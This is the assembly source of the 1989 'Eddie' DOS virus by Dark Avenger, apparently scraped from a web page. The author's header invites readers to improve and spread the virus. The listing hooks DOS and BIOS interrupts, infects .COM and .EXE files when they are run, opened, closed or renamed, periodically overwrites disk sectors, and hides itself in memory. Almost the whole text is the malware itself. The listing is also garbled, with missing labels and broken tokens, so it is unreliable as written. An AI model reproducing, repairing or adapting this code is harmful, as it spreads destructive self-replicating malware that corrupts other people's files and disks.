2022-08-21 09:07:57 +00:00
;* *
;* E D D I E *
;* *
;* by Dark Avenger *
;* *
;* 3-JAN-1989 *
;* *
;* version 1.31x *
;* *
; "Blessed is he who expects nothing, for he shall not be disappointed."
; The original source of one of the first Bulgarian viruses is in front of
; you. As you may notice, it's full of rubbish and bugs, but nevertheless
; the virus has spread surprisingly quickly throughout the country and made a
; quick round the globe. (It's well-known in Eastern and Western Europe, as
; well as in USA.) Due to the anniversary of its creation, the source is
; distributed freely. You have the rights to distribute the source which can
; be charged or free of charge, with the only condition not to modify it.
; The one who intentionally distributes this source modified in any way will
; be punished! Still, the author will be glad if any of you improves it and
; spreads the resulting executive file (i.e., the virus itself). Pay
; attention to the fact that after you assemble the source, the resulting
; .COM file cannot be run. For that purpose you have to create a three byte
; file, consisting of the hex numbers 0e9h, 68h, 0 and then to combine the
; two files. Don't try to place a JMP at the beginning of the source.
; DISCLAIMER: The author does not take any responsability for any damage,
; either direct or implied, caused by the usage or not of this source or of
; the resulting code after assembly. No warranty is made about the product
; functionability or quality.
; I cannot resist to express my special gratitude to my "populizer" Dipl.
; eng. Vesselin Bontchev, who makes me famous and who, wishing it or
; not, helps very much in the spreading of my viruses, in spite of the fact
; that he tries to do just the opposite (writing programs in C has never
; led to any good).
; Greetings to all virus writers!
code seg ment
assume cs : code , ds : code
db 'Eddie lives...somewhere in time!' , 0
dd 12239000h
db 30
; Return the control to an .EXE file:
; Restores DS=ES=PSP, loads SS:SP and CS:IP.
mov bx , es
add bx , 10h
add bx , word ptr cs :[ si + call_adr + 2 ]
mov word ptr cs :[ si + patch + 2 ], bx
mov bx , word ptr cs :[ si + call_adr ]
mov word ptr cs :[ si + patch ], bx
mov bx , es
add bx , 10h
add bx , word ptr cs :[ si + stack_pointer + 2 ]
mov ss , bx
mov sp , word ptr cs :[ si + stack_pointer ]
db 0eah ;JMP XXXX:YYYY
dd 0
; Returns control to a .COM file:
; Restores the first 3 bytes in the
; beginning of the file, loads SP and IP.
mov di , 100h
add si , offset my_save
mov sp , ds :[ 6 ] ;This is incorrect
xor bx , bx
push bx
jmp [ si - 11 ] ;si+call_adr-top_file
; Program entry point
call relative
pop si ;SI = $
sub si , offset relative
cmp word ptr cs :[ si + my_save ], 5a4dh
je exe_ok
mov sp , si ;A separate stack is supported for
add sp , offset top_file + 100h ;the .COM files, in order not to
sti ;overlap the stack by the program
cmp sp , ds :[ 6 ]
jnc exit_com
push ax
push es
push si
push ds
mov di , si
; Looking for the address of INT 13h handler in ROM-BIOS
xor ax , ax
push ax
mov ds , ax
les ax , ds :[ 13h * 4 ]
mov word ptr cs :[ si + fdisk ], ax
mov word ptr cs :[ si + fdisk + 2 ], es
mov word ptr cs :[ si + di sk ], ax
mov word ptr cs :[ si + di sk + 2 ], es
mov ax , ds :[ 40h * 4 + 2 ] ;The INT 13h vector is moved to INT 40h
cmp ax , 0f000h ;for diskettes if a hard disk is
jne nofdisk ;available
mov word ptr cs :[ si + di sk + 2 ], ax
mov ax , ds :[ 40h * 4 ]
mov word ptr cs :[ si + di sk ], ax
mov dl , 80h
mov ax , ds :[ 41h * 4 + 2 ] ;INT 41h usually points to the segment,
cmp ax , 0f000h ;where the original INT 13h vector is
je isfdisk
cmp ah , 0c8h
jc nofdisk
cmp ah , 0f4h
jnc nofdisk
test al , 7fh
jnz nofdisk
mov ds , ax
cmp ds :[ 0 ], 0aa55h
jne nofdisk
mov dl , ds :[ 2 ]
mov ds , ax
xor dh , dh
mov cl , 9
shl dx , cl
mov cx , dx
xor si , si
lodsw ;Occasionally begins with:
cmp ax , 0fa80h ; CMP DL,80h
jne al tchk ; JNC somewhere
cmp ax , 7380h
je intchk
jne nxt0
cmp ax , 0c2f6h ;or with:
jne nxt ; TEST DL,80h
lodsw ; JNZ somewhere
cmp ax , 7580h
jne nxt0
inc si ;then there is:
lodsw ; INT 40h
cmp ax , 40cdh
je found
sub si , 3
dec si
dec si
dec si
loop findvect
jmp short nofdisk
sub si , 7
mov word ptr cs :[ di + fdisk ], si
mov word ptr cs :[ di + fdisk + 2 ], ds
mov si , di
pop ds
; Check for program is present in memory:
les ax , ds :[ 21h * 4 ]
mov word ptr cs :[ si + save_int_21 ], ax
mov word ptr cs :[ si + save_int_21 + 2 ], es
push cs
pop ds
cmp ax , offset int_21
jne bad_func
xor di , di
mov cx , offset my_size
jne bad_func
loop scan_func
pop es
jmp go_program
; Move the program to the top of memory:
; (it's full of rubbish and bugs here)
pop es
mov ah , 49h
int 21h
mov bx , 0ffffh
mov ah , 48h
int 21h
sub bx ,( top_bz + my_bz + 1ch - 1 ) / 16 + 2
jc go_program
mov cx , es
adc cx , bx
mov ah , 4ah
int 21h
mov bx ,( offset top_bz + offset my_bz + 1ch - 1 ) / 16 + 1
sbb es :[ 2 ], bx
push es
mov es , cx
mov ah , 4ah
int 21h
mov ax , es
dec ax
mov ds , ax
mov word ptr ds :[ 1 ], 8
call mul_16
mov bx , ax
mov cx , dx
pop ds
mov ax , ds
call mul_16
add ax , ds :[ 6 ]
adc dx , 0
sub ax , bx
sbb dx , cx
jc mem_ok
sub ds :[ 6 ], ax ;Reduction of the segment size
pop si
push si
push ds
push cs
xor di , di
mov ds , di
lds ax , ds :[ 27h * 4 ]
mov word ptr cs :[ si + save_int_27 ], ax
mov word ptr cs :[ si + save_int_27 + 2 ], ds
pop ds
mov cx , offset aux_size
rep movsb
xor ax , ax
mov ds , ax
mov ds :[ 21h * 4 ], offset int_21 ;Intercept INT 21h and INT 27h
mov ds :[ 21h * 4 + 2 ], es
mov ds :[ 27h * 4 ], offset int_27
mov ds :[ 27h * 4 + 2 ], es
mov word ptr es :[ filehndl ], ax
pop es
pop si
; Smash the next disk sector:
xor ax , ax
mov ds , ax
mov ax , ds :[ 13h * 4 ]
mov word ptr cs :[ si + save_int_13 ], ax
mov ax , ds :[ 13h * 4 + 2 ]
mov word ptr cs :[ si + save_int_13 + 2 ], ax
mov ds :[ 13h * 4 ], offset int_13
add ds :[ 13h * 4 ], si
mov ds :[ 13h * 4 + 2 ], cs
pop ds
push ds
push si
mov bx , si
lds ax , ds :[ 2ah ]
xor si , si
mov dx , si
scan_envir: ;Fetch program's name
lodsw ;(with DOS 2.x it doesn't work anyway)
dec si
test ax , ax
jnz scan_envir
add si , 3
; The following instruction is complete nonsense. Try to enter a drive &
; directory path in lowercase, then run an infected program from there.
; As a result of an error here and an error in DOS the next sector is not
; smashed. Two memory bytes are smashed instead, most probably onto the
; infected program.
sub al , 'A'
mov cx , 1
push cs
pop ds
add bx , offset int_27
push ax
push bx
push cx
int 25h
pop ax
pop cx
pop bx
inc byte ptr [ bx + 0ah ]
and byte ptr [ bx + 0ah ], 0fh ;It seems that 15 times doing
jnz store_sec ;nothing is not enough for some.
mov al ,[ bx + 10h ]
xor ah , ah
mul word ptr [ bx + 16h ]
add ax ,[ bx + 0eh ]
push ax
mov ax ,[ bx + 11h ]
mov dx , 32
mul dx
div word ptr [ bx + 0bh ]
pop dx
add dx , ax
mov ax ,[ bx + 8 ]
add ax , 40h
cmp ax ,[ bx + 13h ]
jc store_new
inc ax
and ax , 3fh
add ax , dx
cmp ax ,[ bx + 13h ]
jnc small_disk
mov [ bx + 8 ], ax
pop ax
xor dx , dx
push ax
push bx
push cx
int 26h
; The writing through this interrupt is not the smartest thing, because it
; can be intercepted (what Vesselin Bontchev has managed to notice).
pop ax
pop cx
pop bx
pop ax
cmp byte ptr [ bx + 0ah ], 0
jne not_now
mov dx ,[ bx + 8 ]
pop bx
push bx
int 26h
pop ax
pop si
xor ax , ax
mov ds , ax
mov ax , word ptr cs :[ si + save_int_13 ]
mov ds :[ 13h * 4 ], ax
mov ax , word ptr cs :[ si + save_int_13 + 2 ]
mov ds :[ 13h * 4 + 2 ], ax
pop ds
pop ax
cmp word ptr cs :[ si + my_save ], 5a4dh
jne go_exit_com
jmp exit_exe
jmp exit_com
mov al , 3 ;This instruction seems unnecessary
; INT 27h handler (this is necessary)
call al loc
jmp dword ptr cs :[ save_int_27 ]
; During the DOS functions Set & Get Vector it seems that the virus has not
; intercepted them (this is a doubtful advantage and it is a possible
; source of errors with some "intelligent" programs)
mov word ptr cs :[ save_int_27 ], dx
mov word ptr cs :[ save_int_27 + 2 ], ds
mov word ptr cs :[ save_int_21 ], dx
mov word ptr cs :[ save_int_21 + 2 ], ds
les bx , dword ptr cs :[ save_int_27 ]
les bx , dword ptr cs :[ save_int_21 ]
call do_file
call al loc
jmp dword ptr cs :[ save_int_21 ]
db 'Diana P.' , 0
; INT 21h handler. Infects files during execution, copying, browsing or
; creating and some other operations. The execution of functions 0 and 26h
; has bad consequences.
push bp
mov bp , sp
push [ bp + 6 ]
pop bp
call ontop
cmp ax , 2521h
je set_int_21
cmp ax , 2527h
je set_int_27
cmp ax , 3521h
je get_int_21
cmp ax , 3527h
je get_int_27
cmp ax , 4b00h
je exec
cmp ah , 3ch
je create
cmp ah , 3eh
je cl ose
cmp ah , 5bh
jne not_create
cmp word ptr cs :[ filehndl ], 0 ;May be 0 if the file is open
jne dont_touch
call see_name
jnz dont_touch
call al loc
call function
jc int_exit
push es
push cs
pop es
push si
push di
push cx
push ax
mov di , offset filehndl
mov si , dx
mov cx , 65
test al , al
jz al l_ok
loop move_name
mov word ptr es :[ filehndl ], cx
pop ax
pop cx
pop di
pop si
pop es
jnc int_exit ;JMP
cmp bx , word ptr cs :[ filehndl ]
jne dont_touch
test bx , bx
jz dont_touch
call al loc
call function
jc int_exit
push ds
push cs
pop ds
push dx
mov dx , offset filehndl + 2
call do_file
mov word ptr cs :[ filehndl ], 0
pop dx
pop ds
jmp go_exit
cmp ah , 3dh
je touch
cmp ah , 43h
je touch
cmp ah , 56h ;Unfortunately, the command inter-
jne dont_touch ;preter does not use this function
call see_name
jnz dont_touch
call do_file
call al loc
call function
push ds
call get_chain
mov byte ptr ds :[ 0 ], 'Z'
pop ds
dummy proc far ;???
ret 2
dummy endp
; Checks whether the file is .COM or .EXE.
; It is not called upon file execution.
push ax
push si
mov si , dx
test al , al
jz bad_name
cmp al , '.'
jnz scan_name
call get_byte
mov ah , al
call get_byte
cmp ax , 'co'
jz pos_com
cmp ax , 'ex'
jnz good_name
call get_byte
cmp al , 'e'
jmp short good_name
call get_byte
cmp al , 'm'
jmp short good_name
inc al
pop si
pop ax
; Converts into lowercase (the subroutines are a great thing).
cmp al , 'C'
jc byte _got
cmp al , 'Y'
jnc byte _got
add al , 20h
; Calls the original INT 21h.
call dword ptr cs :[ save_int_21 ]
; Arrange to infect an executable file.
push ds ;Save the registers in stack
push es
push si
push di
push ax
push bx
push cx
push dx
mov si , ds
xor ax , ax
mov ds , ax
les ax , ds :[ 24h * 4 ] ;Saves INT 13h and INT 24h in stack
push es ;and changes them with what is needed
push ax
mov ds :[ 24h * 4 ], offset int_24
mov ds :[ 24h * 4 + 2 ], cs
les ax , ds :[ 13h * 4 ]
mov word ptr cs :[ save_int_13 ], ax
mov word ptr cs :[ save_int_13 + 2 ], es
mov ds :[ 13h * 4 ], offset int_13
mov ds :[ 13h * 4 + 2 ], cs
push es
push ax
mov ds , si
xor cx , cx ;Arranges to infect Read-only files
mov ax , 4300h
call function
mov bx , cx
and cl , 0feh
cmp cl , bl
je dont_change
mov ax , 4301h
call function
push ds
push dx
push bx
mov ax , 3d02h ;Now we can safely open the file
call function
jc cant_open
mov bx , ax
call di sease
mov ah , 3eh ;Close it
call function
pop cx
pop dx
pop ds
jnc no_update
mov ax , 4301h ;Restores file's attributes
call function ;if they were changed (just in case)
xor ax , ax ;Restores INT 13h and INT 24h
mov ds , ax
pop ds :[ 13h * 4 ]
pop ds :[ 13h * 4 + 2 ]
pop ds :[ 24h * 4 ]
pop ds :[ 24h * 4 + 2 ]
pop dx ;Register restoration
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
; This routine is the working horse.
push cs
pop ds
push cs
pop es
mov dx , offset top_save ;Read the file beginning
mov cx , 18h
mov ah , 3fh
int 21h
xor cx , cx
xor dx , dx
mov ax , 4202h ;Save file length
int 21h
mov word ptr [ top_save + 1ah ], dx
cmp ax , offset my_size ;This should be top_file
sbb dx , 0
jc stop_fuck_2 ;Small files are not infected
mov word ptr [ top_save + 18h ], ax
cmp word ptr [ top_save ], 5a4dh
jne com_file
mov ax , word ptr [ top_save + 8 ]
add ax , word ptr [ top_save + 16h ]
call mul_16
add ax , word ptr [ top_save + 14h ]
adc dx , 0
mov cx , dx
mov dx , ax
jmp short see_sick
cmp byte ptr [ top_save ], 0e9h
jne see_fuck
mov dx , word ptr [ top_save + 1 ]
add dx , 103h
jc see_fuck
dec dh
xor cx , cx
; Check if the file is properly infected
sub dx , startup - copyright
sbb cx , 0
mov ax , 4200h
int 21h
add ax , offset top_file
adc dx , 0
cmp ax , word ptr [ top_save + 18h ]
jne see_fuck
cmp dx , word ptr [ top_save + 1ah ]
jne see_fuck
mov dx , offset top_save + 1ch
mov si , dx
mov cx , offset my_size
mov ah , 3fh
int 21h
jc see_fuck
cmp cx , ax
jne see_fuck
xor di , di
jne see_fuck
loop next_byte
xor cx , cx ;Seek to the end of file
xor dx , dx
mov ax , 4202h
int 21h
cmp word ptr [ top_save ], 5a4dh
je fuck_exe
add ax , offset aux_size + 200h ;Watch out for too big .COM files
adc dx , 0
je fuck_it
; Pad .EXE files to paragraph boundary. This is absolutely unnecessary.
mov dx , word ptr [ top_save + 18h ]
neg dl
and dx , 0fh
xor cx , cx
mov ax , 4201h
int 21h
mov word ptr [ top_save + 18h ], ax
mov word ptr [ top_save + 1ah ], dx
mov ax , 5700h ;Get file's date
int 21h
push cx
push dx
cmp word ptr [ top_save ], 5a4dh
je exe_file ;Very clever, isn't it?
mov ax , 100h
jmp short set_adr
mov ax , word ptr [ top_save + 14h ]
mov dx , word ptr [ top_save + 16h ]
mov di , offset call_adr
mov ax , dx
mov ax , word ptr [ top_save + 10h ]
mov ax , word ptr [ top_save + 0eh ]
mov si , offset top_save ;This offers the possibilities to
movsb ;some nasty programs to restore
movsw ;exactly the original length
xor dx , dx ;of the .EXE files
mov cx , offset top_file
mov ah , 40h
int 21h ;Write the virus
jc go_no_fuck ;(don't trace here)
xor cx , ax
jnz go_no_fuck
mov dx , cx
mov ax , 4200h
int 21h
cmp word ptr [ top_save ], 5a4dh
je do_exe
mov byte ptr [ top_save ], 0e9h
mov ax , word ptr [ top_save + 18h ]
add ax , startup - copyright - 3
mov word ptr [ top_save + 1 ], ax
mov cx , 3
jmp short write_header
jmp short no_fuck
; Construct the .EXE file's header
call mul_hdr
not ax
not dx
inc ax
jne calc_offs
inc dx
add ax , word ptr [ top_save + 18h ]
adc dx , word ptr [ top_save + 1ah ]
mov cx , 10h
div cx
mov word ptr [ top_save + 14h ], startup - copyright
mov word ptr [ top_save + 16h ], ax
add ax ,( offset top_file - offset copyright - 1 ) / 16 + 1
mov word ptr [ top_save + 0eh ], ax
mov word ptr [ top_save + 10h ], 100h
add word ptr [ top_save + 18h ], offset top_file
adc word ptr [ top_save + 1ah ], 0
mov ax , word ptr [ top_save + 18h ]
and ax , 1ffh
mov word ptr [ top_save + 2 ], ax
mov ax , word ptr [ top_save + 19h ]
shr byte ptr [ top_save + 1bh ], 1
rcr ax , 1
jz update_len
inc ax
mov word ptr [ top_save + 4 ], ax
mov cx , 18h
mov dx , offset top_save
mov ah , 40h
int 21h ;Write the file beginning
pop dx
pop cx
jc stop_fuck
mov ax , 5701h ;Restore the original file date
int 21h
; The following is used by the INT 21h and INT 27h handlers in connection
; to the program hiding in memory from those who don't need to see it.
; The whole system is absurd and meaningless and it is also another source
; for program conflicts.
push ds
call get_chain
mov byte ptr ds :[ 0 ], 'M'
pop ds
; Assures that the program is the first one in the processes,
; which have intercepted INT 21h (yet another source of conflicts).
push ds
push ax
push bx
push dx
xor bx , bx
mov ds , bx
lds dx , ds :[ 21h * 4 ]
cmp dx , offset int_21
jne search_segment
mov ax , ds
mov bx , cs
cmp ax , bx
je test_complete
; Searches the segment of the sucker who has intercepted INT 21h, in
; order to find where it has stored the old values and to replace them.
; Nothing is done for INT 27h.
xor bx , bx
mov ax ,[ bx ]
cmp ax , offset int_21
jne search_next
mov ax , cs
cmp ax ,[ bx + 2 ]
je got_him
inc bx
jne search_segment
je return_control
mov ax , word ptr cs :[ save_int_21 ]
mov [ bx ], ax
mov ax , word ptr cs :[ save_int_21 + 2 ]
mov [ bx + 2 ], ax
mov word ptr cs :[ save_int_21 ], dx
mov word ptr cs :[ save_int_21 + 2 ], ds
xor bx , bx
; Even if he has not saved them in the same segment, this won't help him.
mov ds , bx
mov ds :[ 21h * 4 ], offset int_21
mov ds :[ 21h * 4 + 2 ], cs
pop dx
pop bx
pop ax
pop ds
; Fetch the segment of the last MCB
push ax
push bx
mov ah , 62h
call function
mov ax , cs
dec ax
dec bx
mov ds , bx
adc bx , ds :[ 3 ]
cmp bx , ax
jc next_blk
pop bx
pop ax
; Multiply by 16
mov ax , word ptr [ top_save + 8 ]
mov dx , 10h
mul dx
db 'This program was written in the city of Sofia '
db '(C) 1988-89 Dark Avenger' , 0
; INT 13h handler.
; Calls the original vectors in BIOS, if it's a writing call
cmp ah , 3
jnz subfn_ok
cmp dl , 80h
jnc hdisk
db 0eah ;JMP XXXX:YYYY
my_size: ;--- Up to here comparison
disk: ; with the original is made
dd 0
db 0eah ;JMP XXXX:YYYY
dd 0
db 0eah ;JMP XXXX:YYYY
dd 0
dd 100h
dd 0 ;The original value of SS:SP
int 20h ;The original contents of the first
nop ;3 bytes of the file
top_file: ;--- Up to here the code is written
filehndl equ $ ; in the files
filename equ filehndl + 2 ;Buffer for the name of the opened file
save_int_27 equ filename + 65 ;Original INT 27h vector
save_int_21 equ save_int_27 + 4 ;Original INT 21h vector
aux_size equ save_int_21 + 4 ;--- Up to here is moved into memory
top_save equ save_int_21 + 4 ;Beginning of the buffer, that contains
; - The first 24 bytes read from file
; - File length (4 bytes)
; - The last bytes of the file
; (my_size bytes)
top_bz equ top_save - copyright
my_bz equ my_size - copyright
code ends